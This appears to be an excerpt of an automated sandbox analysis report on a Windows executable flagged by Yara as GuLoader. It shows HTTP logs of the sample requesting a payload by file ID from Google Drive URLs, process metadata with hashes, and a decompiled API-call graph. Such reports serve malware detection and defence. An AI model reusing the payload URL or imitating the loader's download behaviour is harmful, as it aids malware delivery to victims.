                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.749989142.250.181.14435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:07:51 UTC460OUTGET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:52 UTC1844INHTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC63_ABeOyhN79BUDBkuYyX9zupD_qrJF-zuc8NHo0436bpUwrZQp317f3biZ5zAHer0
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:52 GMT
                                                Content-Security-Policy: script-src 'nonce-iP3oqmutDjyUbAnCZO8YyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Cross-Origin-Opener-Policy: same-origin
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:07:52 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 6d 54 30 47 37 72 69 4e 55 41 52 2d 47 71 6f 54 4e 49 35 43 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HmT0G7riNUAR-GqoTNI5Cw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.749990172.217.19.1744435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:08:04 UTC418OUTGET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:08:05 UTC1920INHTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:08:05 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-J4wJNlLvhOAqJUaQ1HHgjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.2.749991142.250.181.14435064C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-16 17:08:07 UTC460OUTGET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:08:08 UTC1844INHTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC67My6R1xBplI3UdqAoeNBkzyR7aa_TDIFl4BxQLhgf3regiMYVCAd6lUatu2MkZrxY
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:08:07 GMT
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy: script-src 'nonce-kqs4NCbSAl4Fz1p_SYrTvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:08:08 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 50 43 72 32 6e 75 4b 78 6b 4e 37 66 4c 6a 6e 63 6d 4a 35 58 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CPCr2nuKxkN7fLjncmJ5XA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:4
                                                Start time:12:05:09
                                                Start date:16/12/2024
                                                Path:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"
                                                Imagebase:0x400000
                                                File size:511'843 bytes
                                                MD5 hash:23F5026EF6B69B601F982F0498E02DDB
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1471777576.0000000009256000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:8
                                                Start time:12:05:28
                                                Start date:16/12/2024
                                                Path:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"
                                                Imagebase:0x400000
                                                File size:511'843 bytes
                                                MD5 hash:23F5026EF6B69B601F982F0498E02DDB
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.3137684124.0000000005DE6000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:20.1%
                                                  Dynamic/Decrypted Code Coverage:13.8%
                                                  Signature Coverage:20.8%
                                                  Total number of Nodes:1528
                                                  Total number of Limit Nodes:41
                                                  execution_graph 4942 10001000 4945 1000101b 4942->4945 4952 10001516 4945->4952 4947 10001020 4948 10001024 4947->4948 4949 10001027 GlobalAlloc 4947->4949 4950 1000153d 3 API calls 4948->4950 4949->4948 4951 10001019 4950->4951 4954 1000151c 4952->4954 4953 10001522 4953->4947 4954->4953 4955 1000152e GlobalFree 4954->4955 4955->4947 4956 401d41 GetDC GetDeviceCaps 4957 402b1d 18 API calls 4956->4957 4958 401d5f MulDiv ReleaseDC 4957->4958 4959 402b1d 18 API calls 4958->4959 4960 401d7e 4959->4960 4961 405f6a 18 API calls 4960->4961 4962 401db7 CreateFontIndirectW 4961->4962 4963 4024e8 4962->4963 4007 403cc2 4008 403e15 4007->4008 4009 403cda 4007->4009 4010 403e26 GetDlgItem GetDlgItem 4008->4010 4019 403e66 4008->4019 4009->4008 4011 403ce6 4009->4011 4014 40419a 19 API calls 4010->4014 4012 403cf1 SetWindowPos 4011->4012 4013 403d04 4011->4013 4012->4013 4016 403d21 4013->4016 4017 403d09 ShowWindow 4013->4017 4018 403e50 SetClassLongW 4014->4018 4015 403ec0 4025 403e10 4015->4025 4077 4041e6 4015->4077 4021 403d43 4016->4021 4022 403d29 DestroyWindow 4016->4022 4017->4016 4023 40140b 2 API calls 4018->4023 4019->4015 4024 401389 2 API calls 4019->4024 4027 403d48 SetWindowLongW 4021->4027 4028 403d59 4021->4028 4026 404123 4022->4026 4023->4019 4029 403e98 4024->4029 4026->4025 4035 404154 ShowWindow 4026->4035 4027->4025 4032 403e02 4028->4032 4033 403d65 GetDlgItem 4028->4033 4029->4015 4034 403e9c SendMessageW 4029->4034 4030 40140b 2 API calls 4048 403ed2 4030->4048 4031 404125 DestroyWindow EndDialog 4031->4026 4096 404201 4032->4096 4036 403d95 4033->4036 4037 403d78 SendMessageW IsWindowEnabled 4033->4037 4034->4025 4035->4025 4040 403da2 4036->4040 4041 403db5 4036->4041 4042 403de9 SendMessageW 4036->4042 4051 403d9a 4036->4051 4037->4025 4037->4036 4039 405f6a 18 API calls 4039->4048 4040->4042 4040->4051 4045 403dd2 4041->4045 4046 403dbd 4041->4046 4042->4032 4044 40419a 19 API calls 4044->4048 4050 40140b 2 API calls 4045->4050 4090 40140b 4046->4090 4047 403dd0 4047->4032 4048->4025 4048->4030 4048->4031 4048->4039 4048->4044 4068 404065 DestroyWindow 4048->4068 4080 40419a 4048->4080 4052 403dd9 4050->4052 4093 404173 4051->4093 4052->4032 4052->4051 4054 403f4d GetDlgItem 4055 403f62 4054->4055 4056 403f6a ShowWindow KiUserCallbackDispatcher 4054->4056 4055->4056 4083 4041bc KiUserCallbackDispatcher 4056->4083 4058 403f94 EnableWindow 4061 403fa8 4058->4061 4059 403fad GetSystemMenu EnableMenuItem SendMessageW 4060 403fdd SendMessageW 4059->4060 4059->4061 4060->4061 4061->4059 4084 4041cf SendMessageW 4061->4084 4085 405f48 lstrcpynW 4061->4085 4064 40400b lstrlenW 4065 405f6a 18 API calls 4064->4065 4066 404021 SetWindowTextW 4065->4066 4086 401389 4066->4086 4068->4026 4069 40407f CreateDialogParamW 4068->4069 4069->4026 4070 4040b2 4069->4070 4071 40419a 19 API calls 4070->4071 4072 4040bd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4071->4072 4073 401389 2 API calls 4072->4073 4074 404103 4073->4074 4074->4025 4075 40410b ShowWindow 4074->4075 4076 4041e6 SendMessageW 4075->4076 4076->4026 4078 4041fe 4077->4078 4079 4041ef SendMessageW 4077->4079 4078->4048 4079->4078 4081 405f6a 18 API calls 4080->4081 4082 4041a5 SetDlgItemTextW 4081->4082 4082->4054 4083->4058 4084->4061 4085->4064 4088 401390 4086->4088 4087 4013fe 4087->4048 4088->4087 4089 4013cb MulDiv SendMessageW 4088->4089 4089->4088 4091 401389 2 API calls 4090->4091 4092 401420 4091->4092 4092->4051 4094 404180 SendMessageW 4093->4094 4095 40417a 4093->4095 4094->4047 4095->4094 4097 404219 GetWindowLongW 4096->4097 4098 4042a2 4096->4098 4097->4098 4099 40422a 4097->4099 4098->4025 4100 404239 GetSysColor 4099->4100 4101 40423c 4099->4101 4100->4101 4102 404242 SetTextColor 4101->4102 4103 40424c SetBkMode 4101->4103 4102->4103 4104 404264 GetSysColor 4103->4104 4105 40426a 4103->4105 4104->4105 4106 404271 SetBkColor 4105->4106 4107 40427b 4105->4107 4106->4107 4107->4098 4108 404295 CreateBrushIndirect 4107->4108 4109 40428e DeleteObject 4107->4109 4108->4098 4109->4108 4964 401a42 4965 402b1d 18 API calls 4964->4965 4966 401a48 4965->4966 4967 402b1d 18 API calls 4966->4967 4968 4019f0 4967->4968 4969 402746 4970 402741 4969->4970 4970->4969 4971 402756 FindNextFileW 4970->4971 4972 4027a8 4971->4972 4973 402761 4971->4973 4975 405f48 lstrcpynW 4972->4975 4975->4973 4976 401cc6 4977 402b1d 18 API calls 4976->4977 4978 401cd9 SetWindowLongW 4977->4978 4979 4029c7 4978->4979 4253 401dc7 4261 402b1d 4253->4261 4255 401dcd 4256 402b1d 18 API calls 4255->4256 4257 401dd6 4256->4257 4258 401de8 EnableWindow 4257->4258 4259 401ddd ShowWindow 4257->4259 4260 4029c7 4258->4260 4259->4260 4262 405f6a 18 API calls 4261->4262 4263 402b31 4262->4263 4263->4255 4980 401bca 4981 402b1d 18 API calls 4980->4981 4982 401bd1 4981->4982 4983 402b1d 18 API calls 4982->4983 4984 401bdb 4983->4984 4985 401beb 4984->4985 4986 402b3a 18 API calls 4984->4986 4987 401bfb 4985->4987 4988 402b3a 18 API calls 4985->4988 4986->4985 4989 401c06 4987->4989 4990 401c4a 4987->4990 4988->4987 4992 402b1d 18 API calls 4989->4992 4991 402b3a 18 API calls 4990->4991 4994 401c4f 4991->4994 4993 401c0b 4992->4993 4995 402b1d 18 API calls 4993->4995 4996 402b3a 18 API calls 4994->4996 4997 401c14 4995->4997 4998 401c58 FindWindowExW 4996->4998 4999 401c3a SendMessageW 4997->4999 5000 401c1c SendMessageTimeoutW 4997->5000 5001 401c7a 4998->5001 4999->5001 5000->5001 4286 4014cb 4287 4051f2 25 API calls 4286->4287 4288 4014d2 4287->4288 5002 40194b 5003 402b1d 18 API calls 5002->5003 5004 401952 5003->5004 5005 402b1d 18 API calls 5004->5005 5006 40195c 5005->5006 5007 402b3a 18 API calls 5006->5007 5008 401965 5007->5008 5009 401979 lstrlenW 5008->5009 5014 4019b5 5008->5014 5010 401983 5009->5010 5010->5014 5015 405f48 lstrcpynW 5010->5015 5012 40199e 5013 4019ab lstrlenW 5012->5013 5012->5014 5013->5014 5015->5012 5016 4024cc 5017 402b3a 18 API calls 5016->5017 5018 4024d3 5017->5018 5021 405bb4 GetFileAttributesW CreateFileW 5018->5021 5020 4024df 5021->5020 5022 40164d 5023 402b3a 18 API calls 5022->5023 5024 401653 5023->5024 5025 40628b 2 API calls 5024->5025 5026 401659 5025->5026 5027 4019cf 5028 402b3a 18 API calls 5027->5028 5029 4019d6 5028->5029 5030 402b3a 18 API calls 5029->5030 5031 4019df 5030->5031 5032 4019e6 lstrcmpiW 5031->5032 5033 4019f8 lstrcmpW 5031->5033 5034 4019ec 5032->5034 5033->5034 5035 401e51 5036 402b3a 18 API calls 5035->5036 5037 401e57 5036->5037 5038 4051f2 25 API calls 5037->5038 5039 401e61 5038->5039 5040 4056c3 2 API calls 5039->5040 5041 401e67 5040->5041 5042 401ec6 CloseHandle 5041->5042 5043 401e77 WaitForSingleObject 5041->5043 5045 402793 5041->5045 5042->5045 5044 401e89 5043->5044 5046 401e9b GetExitCodeProcess 5044->5046 5047 4062eb 2 API calls 5044->5047 5048 401eb8 5046->5048 5049 401ead 5046->5049 5050 401e90 WaitForSingleObject 5047->5050 5048->5042 5052 405e8f wsprintfW 5049->5052 5050->5044 5052->5048 4345 401752 4346 402b3a 18 API calls 4345->4346 4347 401759 4346->4347 4348 401781 4347->4348 4349 401779 4347->4349 4401 405f48 lstrcpynW 4348->4401 4400 405f48 lstrcpynW 4349->4400 4352 40177f 4356 4061dc 5 API calls 4352->4356 4353 40178c 4354 405993 3 API calls 4353->4354 4355 401792 lstrcatW 4354->4355 4355->4352 4361 40179e 4356->4361 4357 40628b 2 API calls 4357->4361 4358 4017da 4359 405b8f 2 API calls 4358->4359 4359->4361 4361->4357 4361->4358 4362 4017b0 CompareFileTime 4361->4362 4363 401870 4361->4363 4366 405f48 lstrcpynW 4361->4366 4371 405f6a 18 API calls 4361->4371 4381 401847 4361->4381 4384 405bb4 GetFileAttributesW CreateFileW 4361->4384 4402 405724 4361->4402 4362->4361 4364 4051f2 25 API calls 4363->4364 4367 40187a 4364->4367 4365 4051f2 25 API calls 4383 40185c 4365->4383 4366->4361 4385 403062 4367->4385 4369 4018a1 SetFileTime 4372 4018b3 CloseHandle 4369->4372 4371->4361 4373 4018c4 4372->4373 4372->4383 4374 4018c9 4373->4374 4375 4018dc 4373->4375 4376 405f6a 18 API calls 4374->4376 4377 405f6a 18 API calls 4375->4377 4378 4018d1 lstrcatW 4376->4378 4379 4018e4 4377->4379 4378->4379 4382 405724 MessageBoxIndirectW 4379->4382 4381->4365 4381->4383 4382->4383 4384->4361 4386 403072 SetFilePointer 4385->4386 4387 40308e 4385->4387 4386->4387 4406 40317d GetTickCount 4387->4406 4390 405c37 ReadFile 4391 4030ae 4390->4391 4392 40317d 43 API calls 4391->4392 4399 40188d 4391->4399 4393 4030c5 4392->4393 4394 4030d5 4393->4394 4395 40313f ReadFile 4393->4395 4393->4399 4397 405c37 ReadFile 4394->4397 4398 403108 WriteFile 4394->4398 4394->4399 4395->4399 4397->4394 4398->4394 4398->4399 4399->4369 4399->4372 4400->4352 4401->4353 4403 405739 4402->4403 4404 405785 4403->4404 4405 40574d MessageBoxIndirectW 4403->4405 4404->4361 4405->4404 4407 4032e7 4406->4407 4408 4031ac 4406->4408 4409 402d1a 33 API calls 4407->4409 4419 40330f SetFilePointer 4408->4419 4415 403095 4409->4415 4411 4031b7 SetFilePointer 4417 4031dc 4411->4417 4415->4390 4415->4399 4416 403271 WriteFile 4416->4415 4416->4417 4417->4415 4417->4416 4418 4032c8 SetFilePointer 4417->4418 4420 4032f9 4417->4420 4423 4063ee 4417->4423 4430 402d1a 4417->4430 4418->4407 4419->4411 4421 405c37 ReadFile 4420->4421 4422 40330c 4421->4422 4422->4417 4424 406413 4423->4424 4427 40641b 4423->4427 4424->4417 4425 4064a2 GlobalFree 4426 4064ab GlobalAlloc 4425->4426 4426->4424 4426->4427 4427->4424 4427->4425 4427->4426 4428 406522 GlobalAlloc 4427->4428 4429 406519 GlobalFree 4427->4429 4428->4424 4428->4427 4429->4428 4431 402d43 4430->4431 4432 402d2b 4430->4432 4434 402d53 GetTickCount 4431->4434 4435 402d4b 4431->4435 4433 402d34 DestroyWindow 4432->4433 4438 402d3b 4432->4438 4433->4438 4437 402d61 4434->4437 4434->4438 4445 4062eb 4435->4445 4439 402d96 CreateDialogParamW ShowWindow 4437->4439 4440 402d69 4437->4440 4438->4417 4439->4438 4440->4438 4449 402cfe 4440->4449 4442 402d77 wsprintfW 4443 4051f2 25 API calls 4442->4443 4444 402d94 4443->4444 4444->4438 4446 406308 PeekMessageW 4445->4446 4447 406318 4446->4447 4448 4062fe DispatchMessageW 4446->4448 4447->4438 4448->4446 4450 402d0d 4449->4450 4451 402d0f MulDiv 4449->4451 4450->4451 4451->4442 4452 402253 4453 402261 4452->4453 4454 40225b 4452->4454 4456 402b3a 18 API calls 4453->4456 4459 40226f 4453->4459 4455 402b3a 18 API calls 4454->4455 4455->4453 4456->4459 4457 40227d 4458 402b3a 18 API calls 4457->4458 4461 402286 WritePrivateProfileStringW 4458->4461 4459->4457 4460 402b3a 18 API calls 4459->4460 4460->4457 5067 402454 5068 402c44 19 API calls 5067->5068 5069 40245e 5068->5069 5070 402b1d 18 API calls 5069->5070 5071 402467 5070->5071 5072 40248b RegEnumValueW 5071->5072 5073 40247f RegEnumKeyW 5071->5073 5074 402793 5071->5074 5072->5074 5075 4024a4 RegCloseKey 5072->5075 5073->5075 5075->5074 5077 401ed4 5078 402b3a 18 API calls 5077->5078 5079 401edb 5078->5079 5080 40628b 2 API calls 5079->5080 5081 401ee1 5080->5081 5082 401ef2 5081->5082 5084 405e8f wsprintfW 5081->5084 5084->5082 4475 4022d5 4476 402305 4475->4476 4477 4022da 4475->4477 4479 402b3a 18 API calls 4476->4479 4478 402c44 19 API calls 4477->4478 4480 4022e1 4478->4480 4481 40230c 4479->4481 4482 4022eb 4480->4482 4486 402322 4480->4486 4487 402b7a RegOpenKeyExW 4481->4487 4483 402b3a 18 API calls 4482->4483 4485 4022f2 RegDeleteValueW RegCloseKey 4483->4485 4485->4486 4488 402c0e 4487->4488 4492 402ba5 4487->4492 4488->4486 4489 402bcb RegEnumKeyW 4490 402bdd RegCloseKey 4489->4490 4489->4492 4493 4062b2 3 API calls 4490->4493 4491 402c02 RegCloseKey 4495 402bf1 4491->4495 4492->4489 4492->4490 4492->4491 4494 402b7a 3 API calls 4492->4494 4496 402bed 4493->4496 4494->4492 4495->4488 4496->4495 4497 402c1d RegDeleteKeyW 4496->4497 4497->4495 4505 4014d7 4506 402b1d 18 API calls 4505->4506 4507 4014dd Sleep 4506->4507 4509 4029c7 4507->4509 4721 40335a #17 SetErrorMode OleInitialize 4722 4062b2 3 API calls 4721->4722 4723 40339d SHGetFileInfoW 4722->4723 4796 405f48 lstrcpynW 4723->4796 4725 4033c8 GetCommandLineW 4797 405f48 lstrcpynW 4725->4797 4727 4033da GetModuleHandleW 4728 4033f4 4727->4728 4729 4059c0 CharNextW 4728->4729 4730 403402 CharNextW 4729->4730 4738 403414 4730->4738 4731 403516 4732 40352a GetTempPathW 4731->4732 4798 403326 4732->4798 4734 403542 4735 403546 GetWindowsDirectoryW lstrcatW 4734->4735 4736 40359c DeleteFileW 4734->4736 4739 403326 11 API calls 4735->4739 4806 402dbc GetTickCount GetModuleFileNameW 4736->4806 4737 4059c0 CharNextW 4737->4738 4738->4731 4738->4737 4744 403518 4738->4744 4741 403562 4739->4741 4741->4736 4743 403566 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4741->4743 4742 4035b0 4750 4059c0 CharNextW 4742->4750 4779 403653 4742->4779 4791 403663 4742->4791 4746 403326 11 API calls 4743->4746 4890 405f48 lstrcpynW 4744->4890 4749 403594 4746->4749 4749->4736 4749->4791 4762 4035cf 4750->4762 4752 403772 4755 403815 ExitProcess 4752->4755 4760 4062b2 3 API calls 4752->4760 4753 40367c 4754 405724 MessageBoxIndirectW 4753->4754 4756 40368a ExitProcess 4754->4756 4757 403692 